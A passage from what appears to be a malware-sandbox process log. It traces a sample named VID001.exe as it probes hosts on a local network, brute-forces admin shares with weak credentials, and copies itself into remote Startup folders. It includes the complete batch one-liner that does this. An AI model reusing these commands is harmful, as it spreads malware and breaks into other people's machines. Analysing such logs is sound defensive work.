5⤵
PID:2776

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "123" /user:"user"
5⤵
PID:2828

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "123" /user:"user"
5⤵
PID:2848

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2900

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "0" /user:"admin"
5⤵
PID:2932

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "0" /user:"admin"
5⤵
PID:2368

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2960

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ """" /user:"admin"
5⤵
PID:2984

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users """" /user:"admin"
5⤵
PID:3036

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:3032

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "admin" /user:"admin"
5⤵
PID:3044

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "admin" /user:"admin"
5⤵
PID:3064

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:2088

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"admin"
5⤵
PID:1064

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"admin"
5⤵
PID:2152

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2204

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "123" /user:"admin"
5⤵
PID:1016

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "123" /user:"admin"
5⤵
PID:1900

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2232

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "0" /user:"àäìèíèñòðàòîð"
5⤵
PID:2296

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "0" /user:"àäìèíèñòðàòîð"
5⤵
PID:2404

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2324

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ """" /user:"àäìèíèñòðàòîð"
5⤵
PID:2440

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users """" /user:"àäìèíèñòðàòîð"
5⤵
PID:2416

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2480

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
5⤵
PID:2544

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
5⤵
PID:2612

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2600

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "1" /user:"àäìèíèñòðàòîð"
5⤵
PID:2624

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "1" /user:"àäìèíèñòðàòîð"
5⤵
PID:2676

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2680

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\C$ "123" /user:"àäìèíèñòðàòîð"
5⤵
PID:2696

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.255\Users "123" /user:"àäìèíèñòðàòîð"
5⤵
PID:2752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view \\10.7.0.19|find /i " "
5⤵
PID:2744

C:\Windows\SysWOW64\net.exe
net view \\10.7.0.19
6⤵
- Discovers systems in the same network
PID:2748

C:\Windows\SysWOW64\find.exe
find /i " "
6⤵
PID:2756

C:\Windows\SysWOW64\net.exe
net use * /delete /y
5⤵
PID:2804

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:2780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2828

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.19\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:2836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2876

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.19\C$\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:2872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:1948

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.19\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:2916

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ /delete /y
5⤵
PID:2896

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
5⤵
- Runs ping.exe
PID:188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2960

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.19\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:3008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:3000

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.19\Users\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:3020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:3024

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.19\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:3052

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users /delete /y
5⤵
PID:3056

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
5⤵
- Runs ping.exe
PID:2064

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2060

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ """" /user:"1"
5⤵
PID:2168

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users """" /user:"1"
5⤵
PID:2284

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2028

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"1"
5⤵
PID:1900

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"1"
5⤵
PID:2328

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2356

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"1"
5⤵
PID:2404

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"1"
5⤵
PID:2320

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2460

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "123" /user:"1"
5⤵
PID:2532

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "123" /user:"1"
5⤵
PID:2472

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2632

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "0" /user:"10.7.0.19"
5⤵
PID:2212

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "0" /user:"10.7.0.19"
5⤵
PID:2608

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2636

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ """" /user:"10.7.0.19"
5⤵
PID:1780

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users """" /user:"10.7.0.19"
5⤵
PID:2680

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:2696

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "10.7.0.19" /user:"10.7.0.19"
5⤵
PID:2792

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "10.7.0.19" /user:"10.7.0.19"
5⤵
PID:2824

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2844

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"10.7.0.19"
5⤵
PID:1948

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"10.7.0.19"
5⤵
PID:2868

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2372

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "123" /user:"10.7.0.19"
5⤵
PID:2924

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "123" /user:"10.7.0.19"
5⤵
PID:2992

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2984

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "0" /user:"administrator"
5⤵
PID:3024

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "0" /user:"administrator"
5⤵
PID:3016

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2264

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ """" /user:"administrator"
5⤵
PID:780

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users """" /user:"administrator"
5⤵
PID:2020

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:952

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "administrator" /user:"administrator"
5⤵
PID:2208

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "administrator" /user:"administrator"
5⤵
PID:1016

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1996

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"administrator"
5⤵
PID:2340

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"administrator"
5⤵
PID:2356

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2404

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "123" /user:"administrator"
5⤵
PID:2468

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "123" /user:"administrator"
5⤵
PID:2456

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2484

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "0" /user:"user"
5⤵
PID:2472

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "0" /user:"user"
5⤵
PID:2156

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2616

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ """" /user:"user"
5⤵
PID:2636

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users """" /user:"user"
5⤵
PID:1780

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2728

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "user" /user:"user"
5⤵
PID:2736

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "user" /user:"user"
5⤵
PID:2748

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2804

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"user"
5⤵
PID:2768

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"user"
5⤵
PID:2780

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:2912

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "123" /user:"user"
5⤵
PID:1588

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "123" /user:"user"
5⤵
PID:2996

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2952

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "0" /user:"admin"
5⤵
PID:2972

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "0" /user:"admin"
5⤵
PID:3012

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:3048

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ """" /user:"admin"
5⤵
PID:2164

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users """" /user:"admin"
5⤵
PID:1472

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:3040

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "admin" /user:"admin"
5⤵
PID:2020

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "admin" /user:"admin"
5⤵
PID:2148

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2284

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"admin"
5⤵
PID:2220

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"admin"
5⤵
PID:2452

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2320

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "123" /user:"admin"
5⤵
PID:2440

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "123" /user:"admin"
5⤵
PID:2492

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2448

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "0" /user:"àäìèíèñòðàòîð"
5⤵
PID:2612

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "0" /user:"àäìèíèñòðàòîð"
5⤵
PID:2472

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2156

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ """" /user:"àäìèíèñòðàòîð"
5⤵
PID:2692

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users """" /user:"àäìèíèñòðàòîð"
5⤵
PID:2704

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2740

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
5⤵
PID:2696

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
5⤵
PID:2792

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2940

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "1" /user:"àäìèíèñòðàòîð"
5⤵
PID:2852

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "1" /user:"àäìèíèñòðàòîð"
5⤵
PID:2816

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:2956

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\C$ "123" /user:"àäìèíèñòðàòîð"
5⤵
PID:2964

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.19\Users "123" /user:"àäìèíèñòðàòîð"
5⤵
PID:2372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view \\10.7.0.1|find /i " "
5⤵
PID:2924

C:\Windows\SysWOW64\net.exe
net view \\10.7.0.1
6⤵
- Discovers systems in the same network
PID:2960

C:\Windows\SysWOW64\find.exe
find /i " "
6⤵
PID:2952

C:\Windows\SysWOW64\net.exe
net use * /delete /y
5⤵
PID:1356

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:3060

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:3056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:3016

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:1764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:780

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ /delete /y
5⤵
PID:2316

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:1184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2148

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
5⤵
PID:2396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2736

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:2756

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:2792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2840

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:2908

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users /delete /y
5⤵
PID:2940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2804

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
5⤵
- Runs ping.exe
PID:2852

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:3028

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ """" /user:"1"
5⤵
PID:1972

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users """" /user:"1"
5⤵
PID:3056

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2300

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "1" /user:"1"
5⤵
PID:2144

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "1" /user:"1"
5⤵
PID:1900

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:2360

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "1" /user:"1"
5⤵
PID:2412

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "1" /user:"1"
5⤵
PID:2212

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:2660

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "123" /user:"1"
5⤵
PID:2484

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "123" /user:"1"
5⤵
PID:2520

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2512

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "0" /user:"10.7.0.1"
5⤵
PID:2808

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "0" /user:"10.7.0.1"
5⤵
PID:2908

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:1792

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ """" /user:"10.7.0.1"
5⤵
PID:1064

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users """" /user:"10.7.0.1"
5⤵
PID:2184

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1952

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "10.7.0.1" /user:"10.7.0.1"
5⤵
PID:2780

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "10.7.0.1" /user:"10.7.0.1"
5⤵
PID:3028

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1972

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "1" /user:"10.7.0.1"
5⤵
PID:2300

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "1" /user:"10.7.0.1"
5⤵
PID:432

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2320

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "123" /user:"10.7.0.1"
5⤵
PID:1996

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "123" /user:"10.7.0.1"
5⤵
PID:2404

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
- Runs ping.exe
PID:300

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "0" /user:"administrator"
5⤵
PID:940

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "0" /user:"administrator"
5⤵
PID:2204

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2516

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ """" /user:"administrator"
5⤵
PID:2736

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users """" /user:"administrator"
5⤵
PID:2804

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1696

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "administrator" /user:"administrator"
5⤵
PID:2740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=VID001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\!s!\%j\VID001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))
4⤵
PID:2164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"
5⤵
PID:2180

C:\Windows\SysWOW64\find.exe
find /i "\\"
6⤵
PID:2176

C:\Windows\SysWOW64\net.exe
net view
6⤵
- Discovers systems in the same network
PID:432

C:\Windows\SysWOW64\find.exe
find /i " 1"
6⤵
PID:2384

C:\Windows\SysWOW64\ARP.EXE
arp -a
6⤵
PID:1900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c set str_
5⤵
PID:2360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view \\10.7.0.1|find /i " "
5⤵
PID:2312

C:\Windows\SysWOW64\find.exe
find /i " "
6⤵
PID:2404

C:\Windows\SysWOW64\net.exe
net view \\10.7.0.1
6⤵
- Discovers systems in the same network
PID:2424

C:\Windows\SysWOW64\net.exe
net use * /delete /y
5⤵
PID:812

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2072

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:2716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:1572

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:2660

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:2636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:940

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ /delete /y
5⤵
PID:2708

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
5⤵
PID:1780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2184

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:2868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2912

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:3004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo f"
5⤵
PID:2956

C:\Windows\SysWOW64\xcopy.exe
xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.7.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
5⤵
PID:1952

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users /delete /y
5⤵
PID:1588

C:\Windows\SysWOW64\PING.EXE
ping -n 20 localhost
5⤵
PID:2936

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2340

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ """" /user:"1"
5⤵
PID:2404

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users """" /user:"1"
5⤵
PID:2544

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2672

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "1" /user:"1"
5⤵
PID:2204

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "1" /user:"1"
5⤵
PID:2188

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2580

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "1" /user:"1"
5⤵
PID:1068

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "1" /user:"1"
5⤵
PID:2792

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2740

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "123" /user:"1"
5⤵
PID:2720

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "123" /user:"1"
5⤵
PID:2868

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2932

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ "0" /user:"10.7.0.1"
5⤵
PID:2852

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users "0" /user:"10.7.0.1"
5⤵
PID:1924

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:1764

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\C$ """" /user:"10.7.0.1"
5⤵
PID:3012

C:\Windows\SysWOW64\net.exe
net use \\10.7.0.1\Users """" /user:"10.7.0.1"
5⤵
PID:2028

C:\Windows\SysWOW64\PING.EXE
ping -n 3 localhost
5⤵
PID:2624

C:\Windows\SysWOW64\net.exe
